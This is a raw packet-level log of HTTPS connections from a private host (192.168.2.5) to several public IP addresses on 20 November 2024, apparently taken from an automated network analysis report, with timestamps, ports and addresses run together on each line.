                                                                                                                                                                                              Nov 20, 2024 21:28:25.247790098 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.247796059 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.247802019 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.247819901 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.247865915 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.247880936 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.247925043 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.248018026 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.248126984 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.248141050 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.248272896 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.248284101 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.249964952 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250016928 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250051975 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250089884 CET49802443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250093937 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250108957 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250147104 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250197887 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250231028 CET49802443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.250361919 CET49802443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252074003 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252120018 CET49802443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252139091 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252150059 CET44349802141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252191067 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252227068 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252252102 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252271891 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252288103 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252376080 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252545118 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.252554893 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.253592968 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255074024 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255079985 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255665064 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255728006 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255752087 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255764008 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255783081 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.255796909 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.260276079 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.260332108 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.260339975 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.261903048 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.262022018 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.262027979 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.264111042 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.264242887 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.264251947 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.277842045 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.278276920 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.278300047 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.278772116 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.278779984 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.302968025 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.302968979 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.302979946 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.303093910 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.303154945 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.319170952 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.349555969 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.349795103 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.356283903 CET49818443192.168.2.5108.158.75.29
                                                                                                                                                                                              Nov 20, 2024 21:28:25.356331110 CET44349818108.158.75.29192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.356880903 CET49818443192.168.2.5108.158.75.29
                                                                                                                                                                                              Nov 20, 2024 21:28:25.356880903 CET49818443192.168.2.5108.158.75.29
                                                                                                                                                                                              Nov 20, 2024 21:28:25.356924057 CET44349818108.158.75.29192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.367914915 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.368154049 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.372926950 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.379374981 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.379386902 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.379445076 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.379482031 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.379498959 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.379528046 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.379554987 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.385976076 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.418997049 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.419002056 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.419015884 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.419033051 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.434588909 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.453754902 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.455725908 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456053019 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456065893 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456101894 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456129074 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456132889 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456154108 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456168890 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.456440926 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.457699060 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.457763910 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.457788944 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459393978 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459419966 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459462881 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459481955 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459487915 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459490061 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459510088 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459528923 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459588051 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.459589005 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.461875916 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.461920977 CET49799443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.461941004 CET44349799141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.462027073 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.462181091 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.462209940 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.462492943 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.462992907 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.465797901 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.465873957 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.465889931 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.467279911 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.468736887 CET49795443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.468763113 CET44349795141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.475209951 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.475279093 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.475303888 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.475320101 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.475534916 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.477118969 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.477252960 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.477293968 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.477313042 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.477494001 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.479104996 CET49819443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.479130983 CET44349819141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.479360104 CET49819443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.479959011 CET49819443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:25.479970932 CET44349819141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.481081963 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.481103897 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.481626034 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.481633902 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.483248949 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.485295057 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.491322041 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.491460085 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.491471052 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.493392944 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.493479013 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.493653059 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.493666887 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.493994951 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.499401093 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.500422001 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.500435114 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.501562119 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.507299900 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.507409096 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.507420063 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.510003090 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.510169029 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.510183096 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.514972925 CET44349724142.250.181.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.515052080 CET44349724142.250.181.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.515238047 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.515305042 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.515305042 CET49724443192.168.2.5142.250.181.100
                                                                                                                                                                                              Nov 20, 2024 21:28:25.515320063 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.517427921 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.517600060 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.517611980 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.521903038 CET44349806104.16.124.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.522144079 CET44349806104.16.124.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.522363901 CET49806443192.168.2.5104.16.124.96
                                                                                                                                                                                              Nov 20, 2024 21:28:25.523420095 CET49806443192.168.2.5104.16.124.96
                                                                                                                                                                                              Nov 20, 2024 21:28:25.523436069 CET44349806104.16.124.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.525082111 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.525177956 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.525188923 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.528251886 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.529203892 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.529293060 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.529556990 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.529567003 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.529872894 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.532798052 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.532958031 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.532969952 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.536678076 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.570636034 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.573383093 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.573471069 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.573638916 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.573653936 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.573718071 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.574826956 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.574834108 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.574891090 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.574904919 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.574923992 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.574939013 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.574965000 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.575278044 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.580079079 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.587002993 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.587013960 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.602139950 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.602159023 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.602185965 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.602277994 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.602277994 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.602293968 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.618546963 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:25.618597031 CET44349820142.250.181.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.618767977 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:25.619093895 CET49820443192.168.2.5142.250.181.34
                                                                                                                                                                                              Nov 20, 2024 21:28:25.619110107 CET44349820142.250.181.34192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.631781101 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.649076939 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.652925968 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.652934074 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.652971029 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.653084993 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.653084993 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.653111935 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.653232098 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.654810905 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.655704021 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.656447887 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.657449007 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.657674074 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.657924891 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.657970905 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.658252001 CET49800443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.658277035 CET44349800141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.658313036 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.658322096 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.666516066 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.666670084 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.666812897 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.667418003 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.667469025 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.667475939 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.672272921 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.672350883 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.672359943 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.677232981 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.677531004 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.677539110 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.680440903 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.680536985 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.680824995 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.686752081 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.686845064 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.686851978 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.686894894 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.691668034 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.691687107 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.691745996 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.695113897 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.695135117 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.696377993 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.696484089 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.697719097 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.706235886 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.706254005 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.706492901 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.710994959 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.711007118 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.711059093 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.720451117 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.720467091 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.720513105 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.722227097 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:25.722315073 CET44349821104.22.1.204192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.722337961 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.722399950 CET49821443192.168.2.5104.22.1.204
                                                                                                                                                                                              Nov 20, 2024 21:28:25.722433090 CET4434979613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.723356009 CET49796443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.729969025 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.730046034 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.734785080 CET44349801141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.734858990 CET49801443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:25.735805988 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:25.736999989 CET44349809136.143.190.100192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.739221096 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:25.740580082 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:25.740587950 CET4434978618.165.220.61192.168.2.5
